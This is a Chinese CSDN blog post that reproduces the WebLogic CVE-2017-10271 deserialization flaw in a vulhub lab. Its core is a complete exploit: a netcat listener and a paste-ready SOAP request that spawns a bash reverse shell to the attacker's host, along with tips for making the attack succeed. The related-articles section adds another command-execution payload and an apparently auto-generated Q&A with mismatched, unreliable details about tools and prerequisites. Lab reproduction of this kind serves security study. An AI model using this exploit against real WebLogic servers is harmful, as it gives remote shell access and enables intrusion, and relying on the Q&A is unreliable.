WebLogic(CVE-2017-10271)漏洞复现

最新推荐文章于 2024-05-24 22:57:12 发布
最新推荐文章于 2024-05-24 22:57:12 发布
阅读量3.8k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞 cve 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51203422/article/details/121361247
版权

docker vulhub搭建好靶场

访问:ip:7001

看到404就说明安装成功,开始进入下一步

访问该链接,显示如下就可能存在漏洞(因为是靶机,所以嘛,肯定有漏洞了)

http://ip:port/wls-wsat/CoordinatorPortType

 本地起好监听

nc -lp port

下方红字需要修改一下ip,修改为被攻击机器

```

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/you_ip/port 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

```

成功反弹shell

如果攻击失败,建议多攻击几次,还有可能是代码,复制错误了,有的文章会自动把tab和空格取消,导致复制到burp里面就是灰色的,无法使用,建议看看图片内的标签颜色

在<string></string>里面执行代码执行,未完待续

诚诚cheng
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Weblogic--CVE-2017-10271
haha1314的博客
07-15 407
Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞CVE-2017-10271Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 环境搭建 启动测试环境: docker-compose up -d 等待一...
CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)
deginner2的博客
07-29 4845
CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)
weblogic CVE-2017-10271漏洞复现
最新发布
qq_68581192的博客
05-24 986
名称:weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)原理:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者可以构造XML语句,上传一句话木马,getshell。
weblogic CVE 2017-10271
ChenD的学习笔记
05-22 1848
将输出重定向到当前循环的Branding_Login_WeblogicConsole.gif文件的同级目录下的pwd.txt文件,因为可以访问到该图片,所以能访问到创建的文件。这里随便找一个可访问的文件,访问192.168.27.128:7001/console,进入到登陆页面,右键查看源代码,随便找一个图片或文件的链接,这就搞到了可访问的文件名。这条命令的意思是,找到所有叫Branding_Login_WeblogicConsole.gif的文件,循环读取,每次循环 执行 id;ifconfig命令,
WeblogicCVE-2017-10271
01-03
weblogic打补丁操作步骤 主义更换路径!攻击者针对WebLogicWLS组件中存在的CVE-2017-10271远程代码执行漏洞,构造请求对运行的WebLogic中间件主机进行攻击,由于该漏洞利用方式简单,且能够直接获取目标服务器的控制权限,影响范围较广,近期发现此漏洞的利用方式为传播虚拟币挖矿程序,不排除会被黑客用于其他目的的攻击。
Weblogic XMLDecoder反序列化漏洞复现(CVE-2017-10271)
又菜又爱倒腾的博客
10-29 1047
#Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)# 一、漏洞简介 weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 二、漏洞影响 影响版本 10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0 三、产生原因 CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执
CVE-2017-10271复现
qq_56258713的博客
07-03 3050
CVE-2017-10271复现
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C <arg> (执行命令)Execute ...
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
Weblogic反序列化漏洞补丁(FMJJ),这是一个累积补丁,代号FMJJ
Weblogic CVE-2017-10271.zip
01-21
Weblogic CVE-2017-10271.zip
CVE-2017-10271(JAVA XMLDecoder反序列化专用工具).zip
06-22
测试专用
WebLogic WLS远程执行漏洞(CVE-2017-10271)验证
12-18
一段小代码,WebLogic WLS远程执行漏洞(CVE-2017-10271)验证。
CVE-2017-10271漏洞复现
qq_36594628的博客
07-27 5228
CVE-2017-10271复现 一、启动环境 ​ 靶机:ubantu20.04 IP:192.168.3.115 ​ 攻击机:win10 IP:192.168.1.238 ​ 在ubantu 20.04 搭建 Vulhub 环境中已经介绍了怎么启动环境。 二、漏洞信息 ​ WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序。 (一)、漏洞描述 ​ 在了解CVE-2017
WebLogic-XMLDecoder(CVE-2017-10271)反序列化漏洞分析及复现
人若无名,便可专心练剑
04-13 1597
下面的内容主要是给师傅们介绍和讲解下weblogic XMLDecoder漏洞,这个漏洞有很多个版本,有多个cve漏洞,这里我主要从基于IDEA和vulhun环境搭建来给师傅们复现下这个weblogic XMLDecoder漏洞复现完成的师傅们,要是基础还可以,学过Java代码的可以尝试掌握下这个漏洞的POC构造,这个是底层代码原理,比较难,小白的话把漏洞原理以及漏洞复现完成即可!!!
WebLogicCVE-2017-10271
锋刃科技的博客
06-09 1724
简介 Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性,备受广大系统管理员的青睐 影响版本 10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。 漏洞复现 使用vulhub和docker快速搭建环境 cd vulhub/weblogic/CVE-2017-10271 docker-compose up -d 访问http://your-ip:700
cve-2017-10271漏洞复现
06-28
### 回答1: CVE-2017-10271漏洞是Oracle WebLogic Server中的一个远程代码执行漏洞。攻击者可以通过发送特制的HTTP请求来利用该漏洞,从而在受影响的系统上执行任意代码。该漏洞已经被公开披露,并且已经有一些工具可以用来复现漏洞。但是,我们不建议未经授权的人员进行漏洞复现,因为这可能会导致系统被攻击者入侵。如果您需要测试您的系统是否受到该漏洞的影响,请咨询安全专家或厂商提供的安全补丁。 ### 回答2: CVE-2017-10271漏洞是Oracle WebLogic Server的一个远程代码执行漏洞,攻击者可以通过构造特定的HTTP请求来向受影响的WebLogic服务器发送恶意代码,在未经授权的情况下执行任意命令或获取服务器操作权限。 漏洞复现需要以下步骤: 1. 确定漏洞影响的WebLogic版本,CVE-2017-10271漏洞影响的版本为12.1.2.0、12.1.3.0、12.2.1.0、12.2.1.1和12.2.1.2,若WebLogic版本符合以上版本则可以进行后续漏洞复现操作。 2.通过漏洞利用工具Metasploit或手工构造特定的HTTP请求向受影响的WebLogic服务器发送恶意代码,触发漏洞,远程代码执行。 3.构造特定的HTTP请求需要以下信息: - 目标WebLogic服务器的IP地址和端口号。 - WebLogic管理员账户的用户名和密码,用于获取控制台访问权限。 - 漏洞利用代码,用于构造HTTP请求并发送到目标WebLogic服务器。 其中,漏洞利用代码结构大致如下: POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: target_weblogic_server_ip:target_port Content-Type: text/xml; charset=utf-8 Content-Length: 800 <?xml version="1.0" encoding="UTF-8"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>echo "";whoami;id;uname -a;echo "> /tmp/shell;sudo chmod 777 /tmp/shell;/tmp/shell</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> 这段代码用于请求WebLogic服务器上的CoordinatorPortType服务,执行恶意代码,获取远程服务器的操作权限。其中,</string>字符串后面的内容是要在目标服务器上执行的命令。 4.成功复现漏洞后,攻击者可以通过远程命令执行获取服务器操作权限,对受影响的服务器进行攻击、篡改或窃取敏感数据等恶意行为。 因此,WebLogic管理员应当及时采取措施,升级至最新版本,关闭不必要的端口,增强安全性,以保护WebLogic服务器不受恶意攻击。 ### 回答3: CVE-2017-10271是一个Oracle WebLogic Server中的远程执行代码漏洞漏洞影响Oracle WebLogic Server 10.3.6.0、12.1.3.0、12.2.1.1和12.2.1.2版本。 漏洞复现步骤如下: 步骤一:下载漏洞复现工具 首先要下载漏洞复现工具weblogic-CNVD-2019-48814: git clone https://github.com/tdy218/OracleWeblogic-CNVD-C-2019-48814.git 步骤二:搭建漏洞环境 安装Oracle WebLogic Server 12.2.1.3.0,安装过程略过。在安装完成后,启动Oracle WebLogic Server管理服务: ${ORACLE_HOME}/user_projects/domains/base_domain/bin/startWebLogic.sh 启动管理服务后,访问http://localhost:7001/console,进入控制台界面,输入管理员账号密码,进入控制台主页。 步骤三:运行漏洞利用脚本 进入weblogic-CNVD-2019-48814目录,运行poc.py脚本,如下所示: python poc.py http://localhost:7001 begin ${arbitary command} 其中,http://localhost:7001是WebLogic Server地址,${arbitary command}是任意需要执行的命令,例如: python poc.py http://localhost:7001 begin ls 上述命令将列出当前目录下的文件列表。 漏洞利用成功后,可以看到攻击者执行的命令结果。 除了使用上述脚本之外,攻击者还可以手动利用该漏洞,具体步骤可以查看漏洞详情。 总结: CVE-2017-10271漏洞是一种影响Oracle WebLogic Server的远程执行代码漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。为了防止该漏洞的攻击,我们可以进行以下措施: 1. 及时升级Oracle WebLogic Server版本,以防止攻击者利用漏洞; 2. 禁用T3协议,仅允许HTTPS连接; 3. 配置防火墙,限制WebLogic Server管理服务的访问来源; 4. 运行安全软件,及时发现漏洞和攻击行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值